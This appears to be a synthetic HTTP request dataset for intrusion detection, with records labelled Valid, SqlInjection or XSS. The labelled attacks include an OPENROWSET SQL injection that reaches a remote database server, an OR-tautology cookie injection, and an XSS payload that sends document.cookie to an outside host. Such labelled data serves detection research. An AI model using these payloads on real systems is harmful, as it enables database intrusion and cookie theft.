UA-CPU: 68000
UA-Disp: 3763,8529,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 154x2368
Via: 2.1 www.ileEue.htm:4, HTTP/0.3 www.ltt7Oti.tiff, HTTP/0.4 68.154.59.201:0
Transfer-Encoding: riSil
Upgrade: oxpen/0.0
Warning: 116 www.eseDe.htm "27q3Eouttsesl7rsU" 
X-Forwarded-For: 15.61.103.36
X-Serial-Number: 63629752073074
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15081
Start - Id: 5096
class: Valid
POST /alcSyR-wMI.WB/NaCteeliie/r58ye.php4? HTTP/1.1
Content-Length: 117
Content-Language: edtIt,hehoxlos
Content-Encoding: identity
Content-Location: http://hxPauqe.uk/ZcTt1Tjh/elegnhA/8oeeeryi/eKuba/iin7d2.pdf
Content-MD5: b281c2hyZWJtdHVPb1c4NA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jul 09 18:52:20 CET
Last-Modified: Mon, 16 Aug 04 12:43:54 UTC
Host: www.w5Ezihtt6.uk:80
Connection: 9nerswe
Accept: */*
Accept-Charset: x-mac-chinesetrad, x-mac-arabic, iso-8859-4;q=0.5
Accept-Encoding: 
Accept-Language: b-r;q=0.4, rirN-hAoi, us-tueJbs
Cache-Control: min-fresh=507
Client-ip: 56.116.172.92
Cookie: mmaehilo=09677
Cookie2: $Version="427"
Date: Mon, 08 Mar 04 24:13:08 CET
ETag: W/"-LSJnK.cmWDIZdXST9."
Expect: 100-continue
From: shorri@mlnSniydiv.gov
If-Modified-Since: Tue, 28 Nov 06 11:36:12 UTC
If-Unmodified-Since: Thu, 25 Dec 08 06:43:36 UTC
If-Match: *
If-None-Match: "GJqJxC9.-qTCM9xdA"
If-Range: "Z8V6IGl0bz6vQL@SF"
Max-Forwards: 2
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Basic ZWhzcDpsdGlzcG4=
Range: 4666-,507125-81685,186998-
Referer: http://www.a2dorb.org/hhrst/eins6/ikTaip9a.avi
TE: trailers
Trailer: Host
User-Agent: mudl8F.j http://www.roio.net
UA-CPU: PowerPC
UA-Disp: 850,8218,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7848x0876
Via: 1.2 110.71.186.247, FTP/9.2 76.158.144.5:3
Transfer-Encoding: Rtsifd
Upgrade: efd74o/3.6, MmfD/3.2, o6ce/9.4
Warning: 172 www.tonle.shtml "itac7inoeo6towt2" "Fri, 23 May 08 05:18:47 CET"
X-Forwarded-For: 248.188.122.40
X-Serial-Number: 093025273
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uriea4aavtrnhl=l7o42xmal&tcn7ml=04085845&dP8aebntsuRet=e58q0fYX&ceRdxt0eb=yKvo &sUeilmT=nd i&shepA=qesh&au=i>otniHt

End - Id: 5096
Start - Id: 4715
class: Valid
POST /nl/tw5GNdqJqAynomIZ9Yji/9lHasdnmwesfme/JZy1SXwindow.openCIOOv0/eSg/tjcUe4aalev84uAna/E9OidbP5Rf/tCFIzDWkIt42Z2D/bOuothJ5ear.gif? HTTP/1.1
Content-Length: 69
Content-Language: fn58Ie
Content-Encoding: compress
Content-Location: /idrct/WanU89x.php4
Content-MD5: bWVyaHRobGRzd3puaGdscw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 May 08 15:17:01 CET
Last-Modified: Tue, 19 Feb 08 04:24:23 GMT
Host: 13.87.141.53:5
Connection: close
Accept: application/*;q=0.0, video/quicktime;q=0.2
Accept-Charset: euc-kr, macintosh;q=0.6
Accept-Encoding: *
Accept-Language: np52-t7esngf, hd-u, aoawa-t;q=0.9, fInmti-1t0nAat;q=0.0
Cache-Control: max-stale
Client-ip: 46.178.44.105
Cookie: eaaRoeN=0a;shrhnDisfysassa=7i_P7-5-U5
Cookie2: $Version="7"
Date: Fri, 19 Jun 09 11:00:33 CET
ETag: W/"VyJdBW_j39y7gy@nVHjI"
Expect: iokxesrg
From: inn4cep@izie0elen.de
If-Modified-Since: Sun, 24 Jul 05 21:02:57 CET
If-Unmodified-Since: Tue, 03 Feb 04 19:40:05 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Mar 04 02:26:17 UTC
Max-Forwards: 4
MIME-Version: 7.7
Pragma: tjTihs7=Ihdti
Proxy-Authorization: wshe kryo=t4krnTk
Authorization: Basic ZWI5bW1veW86cm9lc3R0
Range: -242,-19368,124822-039647
Referer: /ssreih/csecal.pl
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 3.9; da-6I; rv:8.9.7) Gecko/15865139
UA-CPU: Sparc
UA-Disp: 759,838,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 868x5971
Via: jaU/9.1 206.176.45.126, 7.7 www.itheem4p.tiff
Transfer-Encoding: deflate
Upgrade: aaodnM/1.3, n7ieo/2.0, dwoz/1.8, Nd7Zd/3.9
Warning: 098 235.30.125.178 "esttjUveeeheane5ia" "Thu, 27 Dec 07 01:39:19 UTC"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 88567047734
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

gent9drlnxftoi=depassthru]&oiblratdfS1se=hai tnr]oetrwg&y6ga=2255

End - Id: 4715
Start - Id: 35319
class: SqlInjection
GET /oEzAgeAwq/sXkRHrCgkqq7map@X/hNewiafi6yt/neeggKWnrnnitee/zBcsiZei7oMNoaenge/cq5fs.exe?eeslTaqi3yssb=%3B+++insert+++++into+++++OPENROWSET%28++%27SQLoledb%27%2C%27uid%3DAo8maeeEry%3Bpwd%3Dgcsu0er4%3BNetwork%3DDBMSSOCN%3BAddress%3D251.175.232.190%2C1433%3B%27%2C%27select++++*++++from++++_sysdatabases%27%29%3B+select++*+++from++++LinkedOrRemoteSrv1.master.dbo.sysdatabases&WgelfdOshT=efadbe0%26fHq+&UN@qZ5MhlO=e7+smEfmiq HTTP/1.0
Host: 135.216.101.251
Connection: close
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.5, gzip
Accept-Language: *;q=0.4
Cache-Control: max-stale=521
Client-ip: 89.110.200.190
Cookie: tndee1ic6e=54;yeoHs1pFzi=47
Cookie2: $Version="53"
Date: Mon, 27 Nov 06 03:23:45 UTC
ETag: W/"mz5K4DQH@Xm5ZhfU4"
Expect: 100-continue
From: tS3pEo@br4n.it
If-Modified-Since: Wed, 09 Dec 09 17:46:55 CET
If-Unmodified-Since: Thu, 28 Jul 05 09:37:58 CET
If-Match: "aWu0yGrm3AYZHG-Shd0"
If-None-Match: *
If-Range: *
Max-Forwards: 876
MIME-Version: 4.0
Pragma: a='6ode'
Proxy-Authorization: Digest nc=0A24AbAd
Authorization: efat8f 6cuge=cTe2
Range: 9898-,30840-71
Referer: http://www.a9rrbco.de/ryrPg/1c3nn/en5f/eHht/isneo.gz
TE: gzip;q=0.9,chunked
Trailer: User-Agent
User-Agent: Mozilla/7.5 (Windows; U; Win 9x 7.6; ss-lo; rv:7.3.7) Gecko/87746086
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 198x9357
Via: rc9uha/8.1 136.36.32.201
Transfer-Encoding: rYIn6e; anQLe=jgtermi
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 37310092312923
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35319
Start - Id: 17837
class: Valid
GET /oexs/-J/tbHmgtEp8cgi2/e0uhe7/ez1tneioo/8nCExMscript0d8N/n2lwC_g.rz2KLb/hWkZrclgq.tiff?aqetsromeegu=823&loiNsmnuqocrtM=7_MZfG%40_&idfni=uegbAhg%2Fibem&oeo=eeo8e9it&ie=tnrBkd HTTP/1.0
Host: 124.171.37.167
Connection: keep-alive
Accept: image/*;q=0.9, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tioor1-it0nngwN;q=0.6, lnrz-oVeO, aheU-dciTole;q=0.6, SE-snotasul;q=0.6, G8B3I-e;q=0.6
Cache-Control: no-store
Client-ip: 120.118.172.175
Cookie: ece=0;t2eibo=5917982;3kform9=eetaean;sslurEenaeW9=(=o
Cookie2: $Version="8"
Date: Thu, 11 Mar 10 03:00:20 CET
ETag: "9pQKc3CITKwQn.pH7"
Expect: 100-continue
From: lrnihbje@e0fdWo.be
If-Modified-Since: Mon, 29 Mar 04 07:59:37 CET
If-Unmodified-Since: Wed, 01 Apr 09 21:25:41 GMT
If-Match: "Ucex-zDMkIcnD2s"
If-None-Match: "Au6QXS2ibCyTL86IL"
If-Range: *
Max-Forwards: 72
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: KNdsde hply1v=fnlete
Authorization: Basic aGFvZWg6RWdyYWw=
Range: 5-3
Referer: /ituihyi/eertal.html
TE: trailers
Trailer: Host
User-Agent: Mozilla/1.3 (Machintosh; U; PPC 6.0; do-6c; rv:7.1.3) Gecko/84925589
UA-CPU: StrongARM
UA-Disp: 201,6990,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1470x0644
Via: FTP/0.3 www.amwoEnqh.jpeg
Transfer-Encoding: identity
Upgrade: nEs/1.9, s4wti/6.3, wEr/7.0, dbj8bm/0.2, eshoe/0.8
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 58227731
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17837
Start - Id: 2406
class: Valid
GET /h2i65q-r2qSvK.jy5g/dZ@kxGGIhe/ckj0vjaFVg/rPissoEepesg0ieyes/wihrdp/3EX6Y9/dx/idHPb/svPqIj7xgrZdMeAUU/mZx78xqmim18b25MUT/ltjorp/oesaempaeqltt.jpeg?iorsautleh=15&lHBBpasswdDL=Hwzghgceie&tsz=rtyde12bcancheu&Wx_RL=u9BP&aa=%3DEsgstrshx5ora&t5=hc8Rtt&Lgirai=pennfrom&nh2ga=6649&aNEl=yOy&eixEiftih=edeleteenlv7mail%3Et&_zqvabxlvTPvbscript=opxdfnhhiqjDhtt1te HTTP/1.1
Host: www.amhyaeg.biz
Connection: uehnM
Accept: */*
Accept-Charset: x-mac-arabic, iso-8859-7, iso-8859-3;q=0.8, x-mac-arabic
Accept-Encoding: *
Accept-Language: Ae-r;q=0.3, hrPEn7le-rint4rw;q=0.1, aterda-fu83;q=0.5, eu-esa, aa77ais-gknn
Cache-Control: max-age=11968
Client-ip: 168.90.123.51
Cookie: mttefr=mctothy9r4fascc;selp=bQU4H4s4@za;Bsueg=711381
Cookie2: $Version="977"
Date: Thu, 09 Apr 09 08:53:07 GMT
ETag: "uSo6@VVBnTG1anDh1"
Expect: 100-continue
From: xykhras@ilOU.ch
If-Modified-Since: Sun, 24 Dec 06 15:09:39 GMT
If-Unmodified-Since: Tue, 16 Mar 10 10:28:53 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Nov 05 10:50:14 GMT
Max-Forwards: 0904
MIME-Version: 7.8
Pragma: seE='htjo8ap'
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: NTLM aURpR2xzcnVoMGllRXQzY2VlUmZuYWFuN2VlYWN1c0k=
Range: -6438,517-6840,630-69
Referer: http://6aolL.cz/Sieeh.css
TE: chunked,trailers,gzip
Trailer: User-Agent
User-Agent: gqxJkK6@v1 http://www.6oder4.biz
UA-CPU: MIPS
UA-Disp: 5566,8703,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4150x3363
Via: 5.5 41.145.132.54, 7.8 www.wroTdiuv.gif, Yedsr/8.1 187.171.41.247
Transfer-Encoding: deflate
Upgrade: la35/1.7, smytco/9.1, baptns/3.3
Warning: 829 38.166.192.229 "e3tnrcguoeflE3hu" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 222850324123398
----: --------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 2406
Start - Id: 18549
class: Valid
GET /6lJexecQmailv/4BDJ2EIPd/Vgdnv/rlt5pv7XcQG8.gif?zfcE=%24aw&tr6itohbl=ne9l+%7C7An&4jCBsU=5&toheW87ghe=9&heteuaxegealha=gNf7aRuyeEtosi&aa8ridhgnba=f5oeoittnynSne&fK47wp-hZa=30152&oietct=ve&neuwntibcL=9o2KO%25twr5h HTTP/1.1
Host: 42.216.72.154:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, deflate;q=0.3
Accept-Language: lhoahvA-icpfaw;q=0.2, fMs8-nctnsiSq
Cache-Control: tsn1=t4ie
Client-ip: 90.202.52.93
Cookie: naeeeses=:r;psIpasswdkESAdA=oU-1oW0l
Cookie2: $Version="26"
Date: Fri, 26 Dec 08 13:02:32 CET
ETag: "gdheU-L3tkkiiN-h"
Expect: pEbr=m5Fy;tsoAplxR=eieeotia
From: 2dHy@nMyaaotcd.gov
If-Modified-Since: Sun, 01 May 05 03:58:47 CET
If-Unmodified-Since: Mon, 15 Dec 08 10:55:59 GMT
If-Match: "turH_UA1._xoLydi"
If-None-Match: "6azVtGi-@0uKRW5B"
If-Range: *
Max-Forwards: 4
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic ZTByZTpzYVR1aWk=
Authorization: oaLel erdhin=5eel
Range: 46-,56-
Referer: /7witbnte/rh9arnra.sh
TE: trailers
Trailer: Trailer
User-Agent: Aii7HAomIeyrt
UA-CPU: Sparc
UA-Disp: 973,9699,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5538x3966
Via: FTP/6.2 www.tiTd3HN.html, tzV/4.4 www.imi7tu7.js
Transfer-Encoding: 4e1i; eawzey=snsq
Upgrade: eeyva/6.8
Warning: 796 112.101.223.110:07414 "asavawnk" "Fri, 13 Oct 06 24:51:15 CET"
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 6081025334280636009
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 18549
Start - Id: 35114
class: SqlInjection
GET /nMEt8Q/NsarjducoLit1o1bauop/.KgxUTJ/tEa2zoiIdserarn.mspx? HTTP/1.1
Host: www.prehpts.de
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, x-mac-japanese;q=0.8
Accept-Encoding: deflate;q=0.2
Accept-Language: *
Cache-Control: max-stale=7
Cookie: ieo4eDbrnns='     OR   'awjnVnP7t'   = N' ;wrtgegE=niq;dnluoiEscinhest=euJpvDlz1
Date: Thu, 10 Jul 08 22:32:45 UTC
Expect: 100-continue
If-Modified-Since: Tue, 23 Dec 08 08:53:38 CET
If-Unmodified-Since: Thu, 15 May 08 20:56:20 CET
If-Match: *
If-None-Match: "jvWK8Y3PkSr8OO.Fzrx2"
Max-Forwards: 9
MIME-Version: 9.1
Pragma: hqWee9e='twf'
Proxy-Authorization: Digest qop=eeto
Authorization: Digest cnonce="OayUane"
Range: -444440,-61,83757-326236
Referer: /etma/wryhg.asp
TE: gzip
Trailer: If-None-Match
User-Agent: lvd6 (zG0okV8; rKRSwHYC; ob-2wh; t.MfG-K; yHj929cd)
Via: 4.6 57.40.148.33, HTTP/5.2 70.205.108.212
Transfer-Encoding: asNn
Warning: 502 24.120.21.238 "q9oNeeeytxzpYewo" 
X-Serial-Number: 182360849652
----: ----------

null

End - Id: 35114
Start - Id: 3182
class: Valid
GET /estEtkeGcm5a1wyrsDed/catcRd/qd/iKIemmH7QZ1G.exe? HTTP/1.0
Host: www.eeclTg5ar.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale=257
Client-ip: 155.254.73.248
Cookie: 8.7LcKQwU_8=8942972;eesr=7615;droppBO4window.openp=iIgEi:R84y;brohdtRs11gSth=2lh3;iottaeabetdon1=75045;dEtw1hotnssn=ntlS
Cookie2: $Version="4"
Date: Tue, 25 Jul 06 22:43:19 UTC
ETag: "wpYO@bsApGndQi5@"
Expect: saslvds=4etdrtt
From: esjrw@sdiElnyr.fr
If-Modified-Since: Sun, 01 Nov 09 15:46:51 CET
If-Unmodified-Since: Mon, 17 Mar 08 23:49:31 CET
If-Match: *
If-None-Match: "wJbZdiHliZZ-7MeSh1"
If-Range: Tue, 03 Aug 04 06:17:14 CET
Max-Forwards: 3
MIME-Version: 8.1
Pragma: ao3ui2tc='8tbey6'
Proxy-Authorization: Basic OHRyZTpUZWttd3N0ZQ==
Authorization: aq5het 2sSro=5oseHsta
Range: -17
Referer: http://www.tyreh.be/lcue.mpg
TE: chunked;q=0.2
Trailer: If-Modified-Since
User-Agent: ihIEElnrS/5.4
UA-CPU: PowerPC
UA-Disp: 6094,118,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0773x113
Via: HTTP/7.7 37.22.249.107:4, HTTP/4.1 18.242.184.220
Transfer-Encoding: gzip
Upgrade: uRh8ia/4.7
Warning: 520 59.225.217.165:5331 "eos2vb" "Sun, 09 Mar 08 14:23:53 UTC"
X-Forwarded-For: 37.92.1.154
X-Serial-Number: 37153368506514
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3182
Start - Id: 12198
class: Valid
GET /abahrewodxhE/gs0p33owar/mdlhlye7ammem5nfsey/b5pbSg.nBFsF-/W6lIh4RD4/eDomUFr633XtTk/ak0XAja/hMRvvngvqp/e5eXSAtBLZIdD/pygcuA-UGQ/k.PfEiki/VjvL1obIdHcZo.htm?1nemdahorrH=s&2O=asyst8fo6gtr&fsousdas=hzalryotsoA6rnn&hmnnwibeR=%3F-YaoFniframea+easfLlike+%3E&iNssplkjtar=71OuHTJOEwz&ltVl=dLb8CIF&ZsmezaoMtow=%5Caoaehf&QMpassthru.x=0bVYELj&dleuPfa5l=07310&mwnRrhles=4etarah&Ima=9enwEiBbeeeAiGi&xlitcbets=qfEzhbuAqR&yebfalNMqAmhS=08&o7J7509_=anYecopyt2nem&aeal=4ostraccepta HTTP/1.0
Host: www.Zt7ttutd.uk
Connection: keep-alive
Accept: application/x-tar;q=0.8, video/*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: compress, identity;q=0.6, identity;q=0.6, deflate;q=0.7, deflate;q=0.5
Accept-Language: xecay-xo;q=0.9, j1vDy0is-ncaw;q=0.7, aan0g-roradw, po6je-8hmHs, etlce-nealahAe;q=0.3
Cache-Control: min-fresh=4
Client-ip: 191.217.102.14
Cookie: rcUueelCeog=06769228;noeahepn1Esd6c=i9oae
Cookie2: $Version="20"
Date: Sun, 07 Jun 09 17:15:40 CET
ETag: "qWg3bbkc@dxly@JB"
Expect: tEtAetoh=4kiEndcs;drhbda3
From: 3stL@Estri.de
If-Modified-Since: Tue, 19 Sep 06 14:21:01 GMT
If-Unmodified-Since: Fri, 25 Jul 08 07:15:36 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 12 Aug 08 18:12:45 CET
Max-Forwards: 9782
MIME-Version: 0.1
Pragma: ietOfrri='te'
Proxy-Authorization: Basic dzBhb2hzc2w6ZXRvdGU=
Authorization: NTLM cDFkc2NhZXRhYWFUYW5hdGV0bWlFRWVsemJ6bml1bDJ3Y3NlZWNyaWY2cnNyaQ==
Range: -341,81708-966475
Referer: http://www.wgli.it/imdyl/yNraaeia/ptireLe/reeckls.txt
TE: trailers,trailers
Trailer: Expect
User-Agent: DtcsaOry/4.8.0.8.8
UA-CPU: x86
UA-Disp: 3158,9578,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 161x2699
Via: 5.3 www.8itsd.html
Transfer-Encoding: gzip
Upgrade: 8cClsn/2.6, omSiT3/7.4, f6it2/4.1
Warning: 093 www.niwbedo.shtml "3eaiaiRarlwbw8hiaee" "Tue, 10 Jan 06 12:35:20 UTC"
X-Forwarded-For: 75.67.125.249
X-Serial-Number: 1017195793221995647
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 12198
Start - Id: 14754
class: Valid
GET /.c9T/nehisnnuirIi5eict.jpg?eoietmrseoer=%3A9r7ee%3Ds5eajr+&.dxp_-Fprocessing-instructionMD5uS=rKdV.a&ass3t=70&53-JDlibfX3=6i%3Fo&LNrietb=LCshutdownn&wx@8wgetby@=ips HTTP/1.1
Host: www.bavseO.org
Connection: close
Accept: text/xml;q=0.5, image/*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, gzip, deflate;q=0.5, compress;q=0.2, compress
Accept-Language: rce5-nClaoe43, 1u-d
Cache-Control: max-age=6139
Client-ip: 157.191.153.50
Cookie: x3kGo=imtui
Cookie2: $Version="54"
Date: Thu, 03 Jun 04 07:43:35 UTC
ETag: W/"tCbqoq6D.mb74GAjvP"
Expect: 100-continue
From: owsogmh@sdEtisrsme.org
If-Modified-Since: Thu, 30 Mar 06 15:33:51 CET
If-Unmodified-Since: Thu, 13 Mar 08 12:51:44 GMT
If-Match: "jaCFAMOBVF_h9dgOrTb"
If-None-Match: *
If-Range: Mon, 15 Mar 04 12:47:40 UTC
Max-Forwards: 97
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: el3ew eon38=myylbi
Authorization: NTLM cGNzcnZsZ2VydEl1ZXJmc3RsZXRlM2gyZTRwNm5qcjhldDVjYQ==
Range: 31145-
Referer: /astpf/ce6x4ht.swf
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/9.3 (compatible; MSIE 5.4; Mac OS X; zpk3rol; nw0fu6o3o; e6lje)
UA-CPU: StrongARM
UA-Disp: 6549,336,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 283x1210
Via: FTP/4.5 240.115.13.76, Eafdi/0.6 50.129.86.32, 8.9 251.190.129.26
Transfer-Encoding: identity
Upgrade: fnhcG/7.7, 5Uaboe/0.6, satvhh/2.7
Warning: 491 www.jeuiAh5t.htm "wjeodstn" "Wed, 27 May 09 09:21:52 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 9387335
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14754
Start - Id: 3245
class: Valid
GET /lhh/0dr/sg93o/sumRB1/includeykKzn/oudgqSkkGdUxi/sAwget/td-7G-%uq.css?ntsLgda=jloctRo4patuel&al=2071735727&1NHDYMtse=neu4&JwA4wnetcatQh=98&l7tinsertA1S.c=en&clKehnwHoeo=winntioet%3Dl HTTP/1.1
Host: www.darabI.st:76
Connection: epwyge5
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesetrad, x-mac-korean, euc-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 112.59.59.14
Cookie: OVq40lV77=winputpa ertd1Shhik;trSszonptntln8o=or
Cookie2: $Version="39"
Date: Wed, 19 Apr 06 24:49:13 GMT
ETag: "Mpe.8n2Qm9RRdSN"
Expect: 100-continue
From: enn6@rliEa.it
If-Modified-Since: Tue, 04 Sep 07 17:03:43 CET
If-Unmodified-Since: Thu, 18 Mar 10 04:47:04 UTC
If-Match: *
If-None-Match: "iEq.flR8iROa-Mt8pu"
If-Range: Wed, 08 Sep 04 01:54:51 UTC
Max-Forwards: 84
MIME-Version: 6.0
Pragma: hTha='ge'
Proxy-Authorization: mdtd4r Mierh=aeru9Ogt
Authorization: Basic b2VnMXg2OmF0ZW5zRnI5
Range: -0418,8-
Referer: /qiwsad/vu0ws/nrca/uyaoi.wmn
TE: gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/8.7 (compatible; pl0hfAskes; Windows NT; 2ena)
UA-CPU: StrongARM
UA-Disp: 098,469,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 796x812
Via: FTP/8.9 248.227.181.240, HTTP/3.3 198.93.213.59, trt/3.3 www.hsfwKuus.css:733
Transfer-Encoding: 2sqe; pitrww7s=mreUAah
Upgrade: m2sia/0.4, ltolt/9.3, r9eb/4.7, shc6de/5.3
Warning: 802 www.oaete.png "o4sslh" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 3245
Start - Id: 2530
class: Valid
GET /Og/t1GbQk/absu7nlartiSbnpEr/qeSOimlvAsn2Wnrr5qtm/tsanagcpsl/sl/6fushlwfiEparIl/minsertOh-/X_/LFxrL7ih6k/3EcB5YGUq.swf? HTTP/1.0
Host: www.eomaw.it
Connection: g0w5
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: Hacpp-sne2to;q=0.3, 1eswk-sinto;q=0.6
Cache-Control: max-age=28954
Client-ip: 171.191.7.222
Cookie: Emizsr=dtfnc
Cookie2: $Version="794"
Date: Sat, 27 Oct 07 03:43:03 CET
ETag: "lqnni2_FDZ0vXd8lxb"
Expect: 100-continue
From: nnxgy@Ttnc1ez.uk
If-Modified-Since: Wed, 14 Apr 10 10:03:18 CET
If-Unmodified-Since: Tue, 14 Mar 06 03:59:40 CET
If-Match: "is7y4-G-dDK5qwT7b"
If-None-Match: "4vGmxNzLEM4_8.Svb"
If-Range: Thu, 17 Mar 05 17:37:47 CET
Max-Forwards: 46
MIME-Version: 1.2
Pragma: ETEia=tc
Proxy-Authorization: Basic dGl2dEVleHI6Zm5tZ2g=
Authorization: rte9d xtnd=2uyepni
Range: 32-6,-041504
Referer: http://www.nI1eye.st/ahj7u/thatsn/obkha/de8qhX.gif
TE: deflate;q=0.6
Trailer: Referer
User-Agent: Mozilla/5.0 (X11; U; Solaris 5.4; ec-it; rv:8.6.2) Gecko/86991102
UA-CPU: MIPS
UA-Disp: 284,569,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6834x6538
Via: HTTP/6.0 50.4.186.154, rrS/6.2 www.kercex.tiff, 8.2 www.rfJce.css
Transfer-Encoding: gzip
Upgrade: ia4er/9.3, i4os/2.0, 2ctlrr/2.8, ssda5h/3.4, t6p/1.9
Warning: 301 www.naet.js "Hsh2meee5a" "Sat, 22 Apr 06 15:10:43 UTC"
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 347745233258688600
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2530
Start - Id: 47757
class: XSS
GET /JISMH0dv2rj/iIY5z_nOx/WonullNVd1viframe/psl8JQMEPok4z1LNv.swf?c1i7n1onohog=t+ee%25evrd4&iAWGhgeearrter=%3Cimg+++++src%3D%26%7B%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.teiler.com%2Fcgi-bin%2Forndtadeit.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B++++%3E HTTP/1.1
Host: www.nTmndpc.com
Connection: h7ea
Accept: text/*;q=0.6, image/gif;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 24.136.122.169
Cookie: a7nemhnsjh=ihPtOWB;37efiel=373;.sock_streamI_=ecB8vTeRK7d;7amb=eolAgrtSneeomce
Cookie2: $Version="9"
Date: Tue, 11 Sep 07 20:27:32 GMT
ETag: "V0Vh57R1gKYyWC."
Expect: d1Sn88md=cmr2icr;5hrwruT
From: ychumrg@eeAsehi.cz
If-Modified-Since: Tue, 05 Oct 04 20:59:43 CET
If-Unmodified-Since: Sat, 07 Mar 09 21:57:07 UTC
If-Match: *
If-None-Match: "7ahy@EI.TC.k_iHIYb"
If-Range: Mon, 03 Apr 06 03:40:58 GMT
Max-Forwards: 4
MIME-Version: 7.7
Pragma: eath='ohntO'
Proxy-Authorization: Basic dW55dDplbndoaWJj
Authorization: NTLM ZWV5bDVoaW41cmVldWJhd1RvZUQzdGVsb0JVYWVsZzBzNmE=
Range: -41921,082-
Referer: http://www.otieaas.st/BoiRe/uh5m/hfogu/vLTuonek/x2agglu.nsf
TE: deflate;q=0.4,trailers,deflate
Trailer: Date
User-Agent: fa3aD (vFFiTVwr; 3qegMx)
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 561x6609
Via: wlfe/1.9 www.cqtJnru.js, 8.7 74.54.253.242, 4.0 95.121.132.173
Transfer-Encoding: gzip
Upgrade: napl/9.6, u8eeko/2.8, unr/6.5, Cfe7/9.8
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 88.106.208.229
X-Serial-Number: 47690533150312984482
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47757
Start - Id: 8460
class: Valid
GET /5HZG/keoomaael4Civ/Yw/ijPzptPMt/it.cgi?lmra76te=eoPh1W&4n3aYMIE-2=ihIel-&s7cg1r=nomspa0&v9IGex=g0F&eroiulAoiyic=38702&bedCl=to9efibc&hefd=i0allensoreociteusystemw&pAsbgd=048270&sLaqemIr=uentlE9o2thirilmh&dor9t7=6pWc&libjrgq6FXx=httig%29+tb1%3Ftenoeyas&ehsas2=gT%406tRr HTTP/1.1
Host: www.fjtleu.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: z-wetotsrr;q=0.1, 7h-BphsoeE;q=0.0, mtreddsn-3senhftd;q=0.3, ina-a;q=0.7, sjthm1hn-oT;q=0.6
Cache-Control: min-fresh=6286
Client-ip: 235.188.204.49
Cookie: KWp0ywgetGhQecmd=1320481
Cookie2: $Version="52"
